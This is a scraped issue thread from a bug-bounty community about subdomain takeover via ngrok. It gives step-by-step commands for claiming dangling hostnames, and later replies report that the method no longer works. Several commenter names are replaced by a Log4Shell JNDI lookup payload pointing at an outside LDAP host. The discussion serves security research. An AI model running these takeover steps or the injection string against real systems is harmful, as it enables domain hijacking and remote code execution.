subdomain takeover via ngrok service

Question

subdomain takeover via ngrok service

PareshParmar opened this issue 5 years ago · comments

Service name

ngrok
this already mentioned in #85
but few steps are missing there. and that won't work.
when you run ./ngrok http 80 -subdomain cnameentry it will run ngrok on cname domain only , not subdomain, i set up ngrok on my own subdomain to test it.

Proof

if you visit vulnerable subdomain, error will be: Tunnel subdomain.example.com not found
check cname entry of subdomain, it will be something like http://xxxxxxxx.cname.us.ngrok.io/

set up account on https://ngrok.com/
subdomain service for ngrok is only available on paid version.
suggest you to purchase paid version: https://dashboard.ngrok.com/billing (15 days money return policy)
once your account is done, set up ngrok to your local machine , follow these steps: https://dashboard.ngrok.com/get-started
once you're done with set up locally. go to here: https://dashboard.ngrok.com/reserved
Where you can reserve vulnerable subdomain. enter subdomain and click on reserve.
now go to your local machine and run this command to takeover subdomain:
ngrok http -region=us -hostname=subdomain.example.com 80

Documentation

https://ngrok.com/docs
check Tunnels on custom domains (white label URLs)

${jndi:ldap://log4shell.huntress.com:1389/8e9445fe-7d10-452f-a00f-ce0ee01838c7} · Answer 1 · Sat Oct 31 2020 22:32:59 GMT+0800 (China Standard Time)

@PareshParmar @EdOverflow

i found target with this error: Tunnel subdomain.example.com not found
i lookup for it's cname and found cname like : http://abc.cname.us.ngrok.io

when i tried to reserved the subdomain.example.com it say's unavaliable

but when i tried to reserved the cname i successfully reserved that

I don't have access to subdomain.example.com but i have access of its Cname

What to do now ? Kindly help me out

Thanks

${jndi:ldap://log4shell.huntress.com:1389/8e9445fe-7d10-452f-a00f-ce0ee01838c7} · Answer 2 · Sun Nov 01 2020 00:20:19 GMT+0800 (China Standard Time)

In My case for subomain.example.com:

victim has access to subomain.example.com
and i have access to its Cname: http://example.cname.us.ngrok.io

But still the content of http://example.cname.us.ngrok.io is not showing up on subomain.example.com

${jndi:ldap://log4shell.huntress.com:1389/8e9445fe-7d10-452f-a00f-ce0ee01838c7} · Answer 3 · Sun Nov 01 2020 12:45:31 GMT+0800 (China Standard Time)

But still

Kindly can any one tell the Reason ?

@PareshParmar @EdOverflow @codingo @random-robbie

paresh parmar · Answer 4 · Mon Nov 02 2020 01:25:01 GMT+0800 (China Standard Time)

Hi,

You're doing steps wrong.
1 . Add vulnerable domain in your account's custom domain list not cname entry.
2. Once you add that run this command
ngrok http -region=us -hostname=vulnerable.subdomain.com 80

Here's the blog post of mine: https://blog.pareshparmar.com/subdomain-takeover-ngrok/
Let me know if you still face any issue.

${jndi:ldap://log4shell.huntress.com:1389/8e9445fe-7d10-452f-a00f-ce0ee01838c7} · Answer 5 · Mon Nov 02 2020 03:42:26 GMT+0800 (China Standard Time)

Thanks for your reply, I still unable to takeover, Can you mention me the point on which i am wrong

1- I have also added custom domain ( eg. vulnerabledomain.com ) successfully owned

2- when i tried to add ( sudomain.vulnerabledomain.com ) it say's unavaliable

3- then i tried to run these commands in windows

3 (a).: CMD:

ngrok.exe http -region=us -hostname=sudomain.vulnerabledomain.com 1337

Result :

This domain is reserved for another account.
Failed to bind the domain ' cx***.*******.**m ' for the account 'Tayyab Qadir'.

3 (b): CMD:

ngrok.exe http -region=us -hostname=vulnerabledomain.com 1337

Connection build Sucessfully

Can You send me message via Facebook to resolve this matter ?
https://www.facebook.com/tqMr.EditOr Hope so problem will resolve quickly

Thanks

Best Wishes
Tayyab Qadir

paresh parmar · Answer 6 · Mon Nov 02 2020 06:20:57 GMT+0800 (China Standard Time)

Hi, As you mentioned in the second step it says unavailable , which means subdomain is added in another account.

but feel free to dm me, Ill check: https://twitter.com/Paresh_parmar1

OffensiveBugHunter · Answer 7 · Thu Feb 24 2022 19:16:11 GMT+0800 (China Standard Time)

I have a sundomain which is pointing to {{random-string}}.cname.{{zone}}.ngrok.io , the cname is showing the error - "Tunnel {{rngrok-cname}} not found" but the subdomain pointing to it is showing some else response which is - "No webpage was found {{domain name}}- (404)", so do you think this can be taken over? and how do you think I can takeover it, because there's a random string in the cname, how can I as an attacker control that and takeover if there's a random string on some other takeovers of ngrok?

Some help will be very much appreciated :)

Yassine ABOUKIR · Answer 8 · Thu Apr 07 2022 01:11:59 GMT+0800 (China Standard Time)

Hi,

I don't think this is vulnerable, at least not anymore. I've got this instance: xyz.ngrok.io which shows:

Tunnel xyz.ngrok.io not found

I subscribed for a basic plan and tried to take it over but it was unavailable in US, only xyz.eu.ngrok.io, for example, would be up for grabs.

ikarann · Answer 9 · Fri Apr 22 2022 19:54:33 GMT+0800 (China Standard Time)

Not Vulnerable.

nin-ack · Answer 10 · Wed Nov 30 2022 02:40:56 GMT+0800 (China Standard Time)

Another chiming in to say that ngrok no longer appears vulnerable.

No Name · Answer 11 · Mon Jan 16 2023 00:29:54 GMT+0800 (China Standard Time)

I have Tunnel qqqq.wwww.com not found error and CNAME xxxxxxxx.cname.eu.ngrok.io

If i try to claim qqqq.wwww.com it says that domain is unavailable. fixed?

abd-4fg · Answer 12 · Mon Jan 16 2023 02:52:42 GMT+0800 (China Standard Time)

Subdomain Takeover via Ngrok is not possible anymore !

~ Confirmed from Ngrok Team.